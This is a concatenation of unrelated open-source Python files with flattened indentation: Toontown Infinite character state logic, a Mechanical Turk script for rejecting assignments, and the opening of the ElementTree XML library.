from toontown.toonbase import ToontownGlobals
import CCharChatter
import CCharPaths
class CharLonelyStateAI(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharLonelyStateAI')
def __init__(self, doneEvent, character):
StateData.StateData.__init__(self, doneEvent)
self._CharLonelyStateAI__doneEvent = doneEvent
self.character = character
def enter(self):
if hasattr(self.character, 'name'):
name = self.character.getName()
else:
name = 'character'
self.notify.debug('Lonely ' + self.character.getName() + '...')
StateData.StateData.enter(self)
duration = random.randint(3, 15)
taskMgr.doMethodLater(duration, self._CharLonelyStateAI__doneHandler, self.character.taskName('startWalking'))
def exit(self):
StateData.StateData.exit(self)
taskMgr.remove(self.character.taskName('startWalking'))
def _CharLonelyStateAI__doneHandler(self, task):
doneStatus = { }
doneStatus['state'] = 'lonely'
doneStatus['status'] = 'done'
messenger.send(self._CharLonelyStateAI__doneEvent, [
doneStatus])
return Task.done
class CharChattyStateAI(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharChattyStateAI')
def __init__(self, doneEvent, character):
StateData.StateData.__init__(self, doneEvent)
self._CharChattyStateAI__doneEvent = doneEvent
self.character = character
self._CharChattyStateAI__chatTaskName = 'characterChat-' + str(character)
self.lastChatTarget = 0
self.nextChatTime = 0
self.lastMessage = [
-1,
-1]
def enter(self):
if hasattr(self.character, 'name'):
name = self.character.getName()
else:
name = 'character'
self.notify.debug('Chatty ' + self.character.getName() + '...')
self.chatter = CCharChatter.getChatter(self.character.getName(), self.character.getCCChatter())
if self.chatter != None:
taskMgr.remove(self._CharChattyStateAI__chatTaskName)
taskMgr.add(self.blather, self._CharChattyStateAI__chatTaskName)
StateData.StateData.enter(self)
def pickMsg(self, category):
self.getLatestChatter()
if self.chatter:
return random.randint(0, len(self.chatter[category]) - 1)
else:
return None
def getLatestChatter(self):
self.chatter = CCharChatter.getChatter(self.character.getName(), self.character.getCCChatter())
def setCorrectChatter(self):
self.chatter = CCharChatter.getChatter(self.character.getName(), self.character.getCCChatter())
def blather(self, task):
now = globalClock.getFrameTime()
if now < self.nextChatTime:
return Task.cont
self.getLatestChatter()
if self.character.lostInterest():
self.leave()
return Task.done
if not self.chatter:
self.notify.debug('I do not want to talk')
return Task.done
if not self.character.getNearbyAvatars():
return Task.cont
target = self.character.getNearbyAvatars()[0]
if self.lastChatTarget != target:
self.lastChatTarget = target
category = CCharChatter.GREETING
else:
category = CCharChatter.COMMENT
self.setCorrectChatter()
if category == self.lastMessage[0] and len(self.chatter[category]) > 1:
msg = self.lastMessage[1]
lastMsgIndex = self.lastMessage[1]
if lastMsgIndex < len(self.chatter[category]) and lastMsgIndex >= 0:
while self.chatter[category][msg] == self.chatter[category][lastMsgIndex]:
msg = self.pickMsg(category)
if not msg:
break
continue
else:
msg = self.pickMsg(category)
else:
msg = self.pickMsg(category)
if msg == None:
self.notify.debug('I do not want to talk')
return Task.done
self.character.sendUpdate('setChat', [
category,
msg,
target])
self.lastMessage = [
category,
msg]
self.nextChatTime = now + 8.0 + random.random() * 4.0
return Task.cont
def leave(self):
if self.chatter != None:
category = CCharChatter.GOODBYE
msg = random.randint(0, len(self.chatter[CCharChatter.GOODBYE]) - 1)
target = self.character.getNearbyAvatars()[0]
self.character.sendUpdate('setChat', [
category,
msg,
target])
taskMgr.doMethodLater(1, self.doneHandler, self.character.taskName('waitToFinish'))
def exit(self):
StateData.StateData.exit(self)
taskMgr.remove(self._CharChattyStateAI__chatTaskName)
def doneHandler(self, task):
doneStatus = { }
doneStatus['state'] = 'chatty'
doneStatus['status'] = 'done'
messenger.send(self._CharChattyStateAI__doneEvent, [
doneStatus])
return Task.done
class CharWalkStateAI(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharWalkStateAI')
def __init__(self, doneEvent, character, diffPath = None):
StateData.StateData.__init__(self, doneEvent)
self._CharWalkStateAI__doneEvent = doneEvent
self.character = character
if diffPath == None:
self.paths = CCharPaths.getPaths(character.getName(), character.getCCLocation())
else:
self.paths = CCharPaths.getPaths(diffPath, character.getCCLocation())
self.speed = character.walkSpeed()
self._CharWalkStateAI__lastWalkNode = CCharPaths.startNode
self._CharWalkStateAI__curWalkNode = CCharPaths.startNode
def enter(self):
destNode = self._CharWalkStateAI__lastWalkNode
choices = CCharPaths.getAdjacentNodes(self._CharWalkStateAI__curWalkNode, self.paths)
if len(choices) == 1:
destNode = choices[0]
else:
while destNode == self._CharWalkStateAI__lastWalkNode:
destNode = random.choice(CCharPaths.getAdjacentNodes(self._CharWalkStateAI__curWalkNode, self.paths))
self.notify.debug('Walking ' + self.character.getName() + '... from ' + str(self._CharWalkStateAI__curWalkNode) + '(' + str(CCharPaths.getNodePos(self._CharWalkStateAI__curWalkNode, self.paths)) + ') to ' + str(destNode) + '(' + str(CCharPaths.getNodePos(destNode, self.paths)) + ')')
self.character.sendUpdate('setWalk', [
self._CharWalkStateAI__curWalkNode,
destNode,
globalClockDelta.getRealNetworkTime()])
duration = CCharPaths.getWalkDuration(self._CharWalkStateAI__curWalkNode, destNode, self.speed, self.paths)
t = taskMgr.doMethodLater(duration, self.doneHandler, self.character.taskName(self.character.getName() + 'DoneWalking'))
t.newWalkNode = destNode
self.destNode = destNode
def exit(self):
StateData.StateData.exit(self)
taskMgr.remove(self.character.taskName(self.character.getName() + 'DoneWalking'))
def getDestNode(self):
if hasattr(self, 'destNode') and self.destNode:
return self.destNode
else:
return self._CharWalkStateAI__curWalkNode
def setCurNode(self, curWalkNode):
self._CharWalkStateAI__curWalkNode = curWalkNode
def doneHandler(self, task):
self._CharWalkStateAI__lastWalkNode = self._CharWalkStateAI__curWalkNode
self._CharWalkStateAI__curWalkNode = task.newWalkNode
self.character.sendUpdate('setWalk', [
self._CharWalkStateAI__curWalkNode,
self._CharWalkStateAI__curWalkNode,
globalClockDelta.getRealNetworkTime()])
doneStatus = { }
doneStatus['state'] = 'walk'
doneStatus['status'] = 'done'
messenger.send(self._CharWalkStateAI__doneEvent, [
doneStatus])
return Task.done
class CharFollowChipStateAI(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('CharFollowChipStateAI')
def __init__(self, doneEvent, character, followedChar):
StateData.StateData.__init__(self, doneEvent)
self._CharFollowChipStateAI__doneEvent = doneEvent
self.character = character
self.followedChar = followedChar
self.paths = CCharPaths.getPaths(character.getName(), character.getCCLocation())
self.speed = character.walkSpeed()
self._CharFollowChipStateAI__lastWalkNode = CCharPaths.startNode
self._CharFollowChipStateAI__curWalkNode = CCharPaths.startNode
def enter(self, chipDestNode):
destNode = self._CharFollowChipStateAI__lastWalkNode
choices = CCharPaths.getAdjacentNodes(self._CharFollowChipStateAI__curWalkNode, self.paths)
if len(choices) == 1:
destNode = choices[0]
else:
while destNode == self._CharFollowChipStateAI__lastWalkNode:
destNode = random.choice(CCharPaths.getAdjacentNodes(self._CharFollowChipStateAI__curWalkNode, self.paths))
destNode = chipDestNode
self.notify.debug('Walking ' + self.character.getName() + '... from ' + str(self._CharFollowChipStateAI__curWalkNode) + '(' + str(CCharPaths.getNodePos(self._CharFollowChipStateAI__curWalkNode, self.paths)) + ') to ' + str(destNode) + '(' + str(CCharPaths.getNodePos(destNode, self.paths)) + ')')
self.offsetDistance = ToontownGlobals.DaleOrbitDistance
angle = random.randint(0, 359)
self.offsetX = math.cos(deg2Rad(angle)) * self.offsetDistance
self.offsetY = math.sin(deg2Rad(angle)) * self.offsetDistance
self.character.sendUpdate('setFollowChip', [
self._CharFollowChipStateAI__curWalkNode,
destNode,
globalClockDelta.getRealNetworkTime(),
self.offsetX,
self.offsetY])
duration = CCharPaths.getWalkDuration(self._CharFollowChipStateAI__curWalkNode, destNode, self.speed, self.paths)
t = taskMgr.doMethodLater(duration, self._CharFollowChipStateAI__doneHandler, self.character.taskName(self.character.getName() + 'DoneWalking'))
t.newWalkNode = destNode
def exit(self):
StateData.StateData.exit(self)
taskMgr.remove(self.character.taskName(self.character.getName() + 'DoneWalking'))
def _CharFollowChipStateAI__doneHandler(self, task):
self._CharFollowChipStateAI__lastWalkNode = self._CharFollowChipStateAI__curWalkNode
self._CharFollowChipStateAI__curWalkNode = task.newWalkNode
self.character.sendUpdate('setFollowChip', [
self._CharFollowChipStateAI__curWalkNode,
self._CharFollowChipStateAI__curWalkNode,
globalClockDelta.getRealNetworkTime(),
self.offsetX,
self.offsetY])
doneStatus = { }
doneStatus['state'] = 'walk'
doneStatus['status'] = 'done'
messenger.send(self._CharFollowChipStateAI__doneEvent, [
doneStatus])
return Task.done
class ChipChattyStateAI(CharChattyStateAI):
notify = DirectNotifyGlobal.directNotify.newCategory('ChipChattyStateAI')
def setDaleId(self, daleId):
self.daleId = daleId
self.dale = simbase.air.doId2do.get(self.daleId)
def blather(self, task):
now = globalClock.getFrameTime()
if now < self.nextChatTime:
return Task.cont
self.getLatestChatter()
if self.character.lostInterest():
self.leave()
return Task.done
if not self.chatter:
self.notify.debug('I do not want to talk')
return Task.done
if not self.character.getNearbyAvatars():
return Task.cont
target = self.character.getNearbyAvatars()[0]
if self.lastChatTarget != target:
self.lastChatTarget = target
category = CCharChatter.GREETING
else:
category = CCharChatter.COMMENT
if category == self.lastMessage[0] and len(self.chatter[category]) > 1:
msg = self.lastMessage[1]
lastMsgIndex = self.lastMessage[1]
if lastMsgIndex < len(self.chatter[category]) and lastMsgIndex >= 0:
while self.chatter[category][msg] == self.chatter[category][lastMsgIndex]:
msg = self.pickMsg(category)
if not msg:
break
continue
else:
msg = self.pickMsg(category)
else:
msg = self.pickMsg(category)
if msg == None:
self.notify.debug('I do not want to talk')
return Task.done
self.character.sendUpdate('setChat', [
category,
msg,
target])
if hasattr(self, 'dale') and self.dale:
self.dale.sendUpdate('setChat', [
category,
msg,
target])
self.lastMessage = [
category,
msg]
self.nextChatTime = now + 8.0 + random.random() * 4.0
return Task.cont
def leave(self):
if self.chatter != None:
category = CCharChatter.GOODBYE
msg = random.randint(0, len(self.chatter[CCharChatter.GOODBYE]) - 1)
target = self.character.getNearbyAvatars()[0]
self.character.sendUpdate('setChat', [
category,
msg,
target])
if hasattr(self, 'dale') and self.dale:
self.dale.sendUpdate('setChat', [
category,
msg,
target])
taskMgr.doMethodLater(1, self.doneHandler, self.character.taskName('waitToFinish'))
| ToonTownInfiniteRepo/ToontownInfinite | toontown/classicchars/CharStateDatasAI.py | Python | mit | 14,539 |
import argparse, json
import simpleamt
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[simpleamt.get_parent_parser()])
args = parser.parse_args()
mtc = simpleamt.get_mturk_connection_from_args(args)
reject_ids = []
if args.hit_ids_file is None:
parser.error('Must specify --hit_ids_file.')
with open(args.hit_ids_file, 'r') as f:
hit_ids = [line.strip() for line in f]
for hit_id in hit_ids:
for a in mtc.get_assignments(hit_id):
reject_ids.append(a.AssignmentId)
print ('This will reject %d assignments with '
'sandbox=%s' % (len(reject_ids), str(args.sandbox)))
print 'Continue?'
s = raw_input('(Y/N): ')
if s == 'Y' or s == 'y':
print 'Rejecting assignments'
for idx, assignment_id in enumerate(reject_ids):
print 'Rejecting assignment %d / %d' % (idx + 1, len(reject_ids))
mtc.reject_assignment(assignment_id, feedback='Invalid results')
else:
print 'Aborting'
| achalddave/simple-amt | reject_assignments.py | Python | mit | 970 |
#
# ElementTree
# $Id: ElementTree.py 3440 2008-07-18 14:45:01Z fredrik $
#
# light-weight XML support for Python 2.3 and later.
#
# history (since 1.2.6):
# 2005-11-12 fl added tostringlist/fromstringlist helpers
# 2006-07-05 fl merged in selected changes from the 1.3 sandbox
# 2006-07-05 fl removed support for 2.1 and earlier
# 2007-06-21 fl added deprecation/future warnings
# 2007-08-25 fl added doctype hook, added parser version attribute etc
# 2007-08-26 fl added new serializer code (better namespace handling, etc)
# 2007-08-27 fl warn for broken /tag searches on tree level
# 2007-09-02 fl added html/text methods to serializer (experimental)
# 2007-09-05 fl added method argument to tostring/tostringlist
# 2007-09-06 fl improved error handling
# 2007-09-13 fl added itertext, iterfind; assorted cleanups
# 2007-12-15 fl added C14N hooks, copy method (experimental)
#
# Copyright (c) 1999-2008 by Fredrik Lundh. All rights reserved.
#
# fredrik@pythonware.com
# http://www.pythonware.com
#
# --------------------------------------------------------------------
# The ElementTree toolkit is
#
# Copyright (c) 1999-2008 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
# Licensed to PSF under a Contributor Agreement.
# See http://www.python.org/psf/license for licensing details.
__all__ = [
# public symbols
"Comment",
"dump",
"Element", "ElementTree",
"fromstring", "fromstringlist",
"iselement", "iterparse",
"parse", "ParseError",
"PI", "ProcessingInstruction",
"QName",
"SubElement",
"tostring", "tostringlist",
"TreeBuilder",
"VERSION",
"XML",
"XMLParser", "XMLTreeBuilder",
]
VERSION = "1.3.0"
##
# The <b>Element</b> type is a flexible container object, designed to
# store hierarchical data structures in memory. The type can be
# described as a cross between a list and a dictionary.
# <p>
# Each element has a number of properties associated with it:
# <ul>
# <li>a <i>tag</i>. This is a string identifying what kind of data
# this element represents (the element type, in other words).</li>
# <li>a number of <i>attributes</i>, stored in a Python dictionary.</li>
# <li>a <i>text</i> string.</li>
# <li>an optional <i>tail</i> string.</li>
# <li>a number of <i>child elements</i>, stored in a Python sequence</li>
# </ul>
#
# To create an element instance, use the {@link #Element} constructor
# or the {@link #SubElement} factory function.
# <p>
# The {@link #ElementTree} class can be used to wrap an element
# structure, and convert it from and to XML.
##
import sys
import re
import warnings
class _SimpleElementPath(object):
# emulate pre-1.2 find/findtext/findall behaviour
def find(self, element, tag, namespaces=None):
for elem in element:
if elem.tag == tag:
return elem
return None
def findtext(self, element, tag, default=None, namespaces=None):
elem = self.find(element, tag)
if elem is None:
return default
return elem.text or ""
def iterfind(self, element, tag, namespaces=None):
if tag[:3] == ".//":
for elem in element.iter(tag[3:]):
yield elem
for elem in element:
if elem.tag == tag:
yield elem
def findall(self, element, tag, namespaces=None):
return list(self.iterfind(element, tag, namespaces))
try:
from . import ElementPath
except ImportError:
ElementPath = _SimpleElementPath()
##
# Parser error. This is a subclass of <b>SyntaxError</b>.
# <p>
# In addition to the exception value, an exception instance contains a
# specific exception code in the <b>code</b> attribute, and the line and
# column of the error in the <b>position</b> attribute.
class ParseError(SyntaxError):
pass
# --------------------------------------------------------------------
##
# Checks if an object appears to be a valid element object.
#
# @param An element instance.
# @return A true value if this is an element object.
# @defreturn flag
def iselement(element):
# FIXME: not sure about this; might be a better idea to look
# for tag/attrib/text attributes
return isinstance(element, Element) or hasattr(element, "tag")
##
# Element class. This class defines the Element interface, and
# provides a reference implementation of this interface.
# <p>
# The element name, attribute names, and attribute values can be
# either ASCII strings (ordinary Python strings containing only 7-bit
# ASCII characters) or Unicode strings.
#
# @param tag The element name.
# @param attrib An optional dictionary, containing element attributes.
# @param **extra Additional attributes, given as keyword arguments.
# @see Element
# @see SubElement
# @see Comment
# @see ProcessingInstruction
class Element(object):
# <tag attrib>text<child/>...</tag>tail
##
# (Attribute) Element tag.
tag = None
##
# (Attribute) Element attribute dictionary. Where possible, use
# {@link #Element.get},
# {@link #Element.set},
# {@link #Element.keys}, and
# {@link #Element.items} to access
# element attributes.
attrib = None
##
# (Attribute) Text before first subelement. This is either a
# string or the value None. Note that if there was no text, this
# attribute may be either None or an empty string, depending on
# the parser.
text = None
##
# (Attribute) Text after this element's end tag, but before the
# next sibling element's start tag. This is either a string or
# the value None. Note that if there was no text, this attribute
# may be either None or an empty string, depending on the parser.
tail = None # text after end tag, if any
# constructor
def __init__(self, tag, attrib={}, **extra):
attrib = attrib.copy()
attrib.update(extra)
self.tag = tag
self.attrib = attrib
self._children = []
def __repr__(self):
return "<Element %s at 0x%x>" % (repr(self.tag), id(self))
##
# Creates a new element object of the same type as this element.
#
# @param tag Element tag.
# @param attrib Element attributes, given as a dictionary.
# @return A new element instance.
def makeelement(self, tag, attrib):
return self.__class__(tag, attrib)
##
# (Experimental) Copies the current element. This creates a
# shallow copy; subelements will be shared with the original tree.
#
# @return A new element instance.
def copy(self):
elem = self.makeelement(self.tag, self.attrib)
elem.text = self.text
elem.tail = self.tail
elem[:] = self
return elem
##
# Returns the number of subelements. Note that this only counts
# full elements; to check if there's any content in an element, you
# have to check both the length and the <b>text</b> attribute.
#
# @return The number of subelements.
def __len__(self):
return len(self._children)
def __nonzero__(self):
warnings.warn(
"The behavior of this method will change in future versions. "
"Use specific 'len(elem)' or 'elem is not None' test instead.",
FutureWarning, stacklevel=2
)
return len(self._children) != 0 # emulate old behaviour, for now
##
# Returns the given subelement, by index.
#
# @param index What subelement to return.
# @return The given subelement.
# @exception IndexError If the given element does not exist.
def __getitem__(self, index):
return self._children[index]
##
# Replaces the given subelement, by index.
#
# @param index What subelement to replace.
# @param element The new element value.
# @exception IndexError If the given element does not exist.
def __setitem__(self, index, element):
# if isinstance(index, slice):
# for elt in element:
# assert iselement(elt)
# else:
# assert iselement(element)
self._children[index] = element
##
# Deletes the given subelement, by index.
#
# @param index What subelement to delete.
# @exception IndexError If the given element does not exist.
def __delitem__(self, index):
del self._children[index]
##
# Adds a subelement to the end of this element. In document order,
# the new element will appear after the last existing subelement (or
# directly after the text, if it's the first subelement), but before
# the end tag for this element.
#
# @param element The element to add.
def append(self, element):
# assert iselement(element)
self._children.append(element)
##
# Appends subelements from a sequence.
#
# @param elements A sequence object with zero or more elements.
# @since 1.3
def extend(self, elements):
# for element in elements:
# assert iselement(element)
self._children.extend(elements)
##
# Inserts a subelement at the given position in this element.
#
# @param index Where to insert the new subelement.
def insert(self, index, element):
# assert iselement(element)
self._children.insert(index, element)
##
# Removes a matching subelement. Unlike the <b>find</b> methods,
# this method compares elements based on identity, not on tag
# value or contents. To remove subelements by other means, the
# easiest way is often to use a list comprehension to select what
# elements to keep, and use slice assignment to update the parent
# element.
#
# @param element What element to remove.
# @exception ValueError If a matching element could not be found.
def remove(self, element):
# assert iselement(element)
self._children.remove(element)
##
# (Deprecated) Returns all subelements. The elements are returned
# in document order.
#
# @return A list of subelements.
# @defreturn list of Element instances
def getchildren(self):
warnings.warn(
"This method will be removed in future versions. "
"Use 'list(elem)' or iteration over elem instead.",
DeprecationWarning, stacklevel=2
)
return self._children
##
# Finds the first matching subelement, by tag name or path.
#
# @param path What element to look for.
# @keyparam namespaces Optional namespace prefix map.
# @return The first matching element, or None if no element was found.
# @defreturn Element or None
def find(self, path, namespaces=None):
return ElementPath.find(self, path, namespaces)
##
# Finds text for the first matching subelement, by tag name or path.
#
# @param path What element to look for.
# @param default What to return if the element was not found.
# @keyparam namespaces Optional namespace prefix map.
# @return The text content of the first matching element, or the
# default value no element was found. Note that if the element
# is found, but has no text content, this method returns an
# empty string.
# @defreturn string
def findtext(self, path, default=None, namespaces=None):
return ElementPath.findtext(self, path, default, namespaces)
##
# Finds all matching subelements, by tag name or path.
#
# @param path What element to look for.
# @keyparam namespaces Optional namespace prefix map.
# @return A list or other sequence containing all matching elements,
# in document order.
# @defreturn list of Element instances
def findall(self, path, namespaces=None):
return ElementPath.findall(self, path, namespaces)
##
# Finds all matching subelements, by tag name or path.
#
# @param path What element to look for.
# @keyparam namespaces Optional namespace prefix map.
# @return An iterator or sequence containing all matching elements,
# in document order.
# @defreturn a generated sequence of Element instances
def iterfind(self, path, namespaces=None):
return ElementPath.iterfind(self, path, namespaces)
##
# Resets an element. This function removes all subelements, clears
# all attributes, and sets the <b>text</b> and <b>tail</b> attributes
# to None.
def clear(self):
self.attrib.clear()
self._children = []
self.text = self.tail = None
##
# Gets an element attribute. Equivalent to <b>attrib.get</b>, but
# some implementations may handle this a bit more efficiently.
#
# @param key What attribute to look for.
# @param default What to return if the attribute was not found.
# @return The attribute value, or the default value, if the
# attribute was not found.
# @defreturn string or None
def get(self, key, default=None):
return self.attrib.get(key, default)
##
# Sets an element attribute. Equivalent to <b>attrib[key] = value</b>,
# but some implementations may handle this a bit more efficiently.
#
# @param key What attribute to set.
# @param value The attribute value.
def set(self, key, value):
self.attrib[key] = value
##
# Gets a list of attribute names. The names are returned in an
# arbitrary order (just like for an ordinary Python dictionary).
# Equivalent to <b>attrib.keys()</b>.
#
# @return A list of element attribute names.
# @defreturn list of strings
def keys(self):
return self.attrib.keys()
##
# Gets element attributes, as a sequence. The attributes are
# returned in an arbitrary order. Equivalent to <b>attrib.items()</b>.
#
# @return A list of (name, value) tuples for all attributes.
# @defreturn list of (string, string) tuples
def items(self):
return self.attrib.items()
##
# Creates a tree iterator. The iterator loops over this element
# and all subelements, in document order, and returns all elements
# with a matching tag.
# <p>
# If the tree structure is modified during iteration, new or removed
# elements may or may not be included. To get a stable set, use the
# list() function on the iterator, and loop over the resulting list.
#
# @param tag What tags to look for (default is to return all elements).
# @return An iterator containing all the matching elements.
# @defreturn iterator
def iter(self, tag=None):
if tag == "*":
tag = None
if tag is None or self.tag == tag:
yield self
for e in self._children:
for e in e.iter(tag):
yield e
# compatibility
def getiterator(self, tag=None):
# Change for a DeprecationWarning in 1.4
warnings.warn(
"This method will be removed in future versions. "
"Use 'elem.iter()' or 'list(elem.iter())' instead.",
PendingDeprecationWarning, stacklevel=2
)
return list(self.iter(tag))
##
# Creates a text iterator. The iterator loops over this element
# and all subelements, in document order, and returns all inner
# text.
#
# @return An iterator containing all inner text.
# @defreturn iterator
def itertext(self):
tag = self.tag
if not isinstance(tag, basestring) and tag is not None:
return
if self.text:
yield self.text
for e in self:
for s in e.itertext():
yield s
if e.tail:
yield e.tail
# compatibility
_Element = _ElementInterface = Element
##
# Subelement factory. This function creates an element instance, and
# appends it to an existing element.
# <p>
# The element name, attribute names, and attribute values can be
# either 8-bit ASCII strings or Unicode strings.
#
# @param parent The parent element.
# @param tag The subelement name.
# @param attrib An optional dictionary, containing element attributes.
# @param **extra Additional attributes, given as keyword arguments.
# @return An element instance.
# @defreturn Element
def SubElement(parent, tag, attrib={}, **extra):
attrib = attrib.copy()
attrib.update(extra)
element = parent.makeelement(tag, attrib)
parent.append(element)
return element
##
# Comment element factory. This factory function creates a special
# element that will be serialized as an XML comment by the standard
# serializer.
# <p>
# The comment string can be either an 8-bit ASCII string or a Unicode
# string.
#
# @param text A string containing the comment string.
# @return An element instance, representing a comment.
# @defreturn Element
def Comment(text=None):
element = Element(Comment)
element.text = text
return element
##
# PI element factory. This factory function creates a special element
# that will be serialized as an XML processing instruction by the standard
# serializer.
#
# @param target A string containing the PI target.
# @param text A string containing the PI contents, if any.
# @return An element instance, representing a PI.
# @defreturn Element
def ProcessingInstruction(target, text=None):
element = Element(ProcessingInstruction)
element.text = target
if text:
element.text = element.text + " " + text
return element
PI = ProcessingInstruction
##
# QName wrapper. This can be used to wrap a QName attribute value, in
# order to get proper namespace handling on output.
#
# @param text A string containing the QName value, in the form {uri}local,
# or, if the tag argument is given, the URI part of a QName.
# @param tag Optional tag. If given, the first argument is interpreted as
# an URI, and this argument is interpreted as a local name.
# @return An opaque object, representing the QName.
class QName(object):
def __init__(self, text_or_uri, tag=None):
if tag:
text_or_uri = "{%s}%s" % (text_or_uri, tag)
self.text = text_or_uri
def __str__(self):
return self.text
def __hash__(self):
return hash(self.text)
def __cmp__(self, other):
if isinstance(other, QName):
return cmp(self.text, other.text)
return cmp(self.text, other)
# --------------------------------------------------------------------
##
# ElementTree wrapper class. This class represents an entire element
# hierarchy, and adds some extra support for serialization to and from
# standard XML.
#
# @param element Optional root element.
# @keyparam file Optional file handle or file name. If given, the
# tree is initialized with the contents of this XML file.
class ElementTree(object):
def __init__(self, element=None, file=None):
# assert element is None or iselement(element)
self._root = element # first node
if file:
self.parse(file)
##
# Gets the root element for this tree.
#
# @return An element instance.
# @defreturn Element
def getroot(self):
return self._root
##
# Replaces the root element for this tree. This discards the
# current contents of the tree, and replaces it with the given
# element. Use with care.
#
# @param element An element instance.
def _setroot(self, element):
# assert iselement(element)
self._root = element
##
# Loads an external XML document into this element tree.
#
# @param source A file name or file object. If a file object is
# given, it only has to implement a <b>read(n)</b> method.
# @keyparam parser An optional parser instance. If not given, the
# standard {@link XMLParser} parser is used.
# @return The document root element.
# @defreturn Element
# @exception ParseError If the parser fails to parse the document.
def parse(self, source, parser=None):
close_source = False
if not hasattr(source, "read"):
source = open(source, "rb")
close_source = True
try:
if not parser:
parser = XMLParser(target=TreeBuilder())
while 1:
data = source.read(65536)
if not data:
break
parser.feed(data)
self._root = parser.close()
return self._root
finally:
if close_source:
source.close()
##
# Creates a tree iterator for the root element. The iterator loops
# over all elements in this tree, in document order.
#
# @param tag What tags to look for (default is to return all elements)
# @return An iterator.
# @defreturn iterator
def iter(self, tag=None):
# assert self._root is not None
return self._root.iter(tag)
# compatibility
def getiterator(self, tag=None):
# Change for a DeprecationWarning in 1.4
warnings.warn(
"This method will be removed in future versions. "
"Use 'tree.iter()' or 'list(tree.iter())' instead.",
PendingDeprecationWarning, stacklevel=2
)
return list(self.iter(tag))
##
# Same as getroot().find(path), starting at the root of the
# tree.
#
# @param path What element to look for.
# @keyparam namespaces Optional namespace prefix map.
# @return The first matching element, or None if no element was found.
# @defreturn Element or None
def find(self, path, namespaces=None):
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.find(path, namespaces)
##
# Same as getroot().findtext(path), starting at the root of the tree.
#
# @param path What element to look for.
# @param default What to return if the element was not found.
# @keyparam namespaces Optional namespace prefix map.
# @return The text content of the first matching element, or the
# default value no element was found. Note that if the element
# is found, but has no text content, this method returns an
# empty string.
# @defreturn string
def findtext(self, path, default=None, namespaces=None):
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.findtext(path, default, namespaces)
##
# Same as getroot().findall(path), starting at the root of the tree.
#
# @param path What element to look for.
# @keyparam namespaces Optional namespace prefix map.
# @return A list or iterator containing all matching elements,
# in document order.
# @defreturn list of Element instances
def findall(self, path, namespaces=None):
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.findall(path, namespaces)
##
# Finds all matching subelements, by tag name or path.
# Same as getroot().iterfind(path).
#
# @param path What element to look for.
# @keyparam namespaces Optional namespace prefix map.
# @return An iterator or sequence containing all matching elements,
# in document order.
# @defreturn a generated sequence of Element instances
def iterfind(self, path, namespaces=None):
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.iterfind(path, namespaces)
##
# Writes the element tree to a file, as XML.
#
# @def write(file, **options)
# @param file A file name, or a file object opened for writing.
# @param **options Options, given as keyword arguments.
# @keyparam encoding Optional output encoding (default is US-ASCII).
# @keyparam xml_declaration Controls if an XML declaration should
# be added to the file. Use False for never, True for always,
# None for only if not US-ASCII or UTF-8. None is default.
# @keyparam default_namespace Sets the default XML namespace (for "xmlns").
# @keyparam method Optional output method ("xml", "html", "text" or
# "c14n"; default is "xml").
def write(self, file_or_filename,
# keyword arguments
encoding=None,
xml_declaration=None,
default_namespace=None,
method=None):
# assert self._root is not None
if not method:
method = "xml"
elif method not in _serialize:
# FIXME: raise an ImportError for c14n if ElementC14N is missing?
raise ValueError("unknown method %r" % method)
if hasattr(file_or_filename, "write"):
file = file_or_filename
else:
file = open(file_or_filename, "wb")
try:
write = file.write
if not encoding:
if method == "c14n":
encoding = "utf-8"
else:
encoding = "us-ascii"
elif xml_declaration or (xml_declaration is None and
encoding not in ("utf-8", "us-ascii")):
if method == "xml":
write("<?xml version='1.0' encoding='%s'?>\n" % encoding)
if method == "text":
_serialize_text(write, self._root, encoding)
else:
qnames, namespaces = _namespaces(
self._root, encoding, default_namespace
)
serialize = _serialize[method]
serialize(write, self._root, encoding, qnames, namespaces)
finally:
if file_or_filename is not file:
file.close()
def write_c14n(self, file):
# lxml.etree compatibility. use output method instead
return self.write(file, method="c14n")
# --------------------------------------------------------------------
# serialization support
def _namespaces(elem, encoding, default_namespace=None):
# identify namespaces used in this tree
# maps qnames to *encoded* prefix:local names
qnames = {None: None}
# maps uri:s to prefixes
namespaces = {}
if default_namespace:
namespaces[default_namespace] = ""
def encode(text):
return text.encode(encoding)
def add_qname(qname):
# calculate serialized qname representation
try:
if qname[:1] == "{":
uri, tag = qname[1:].rsplit("}", 1)
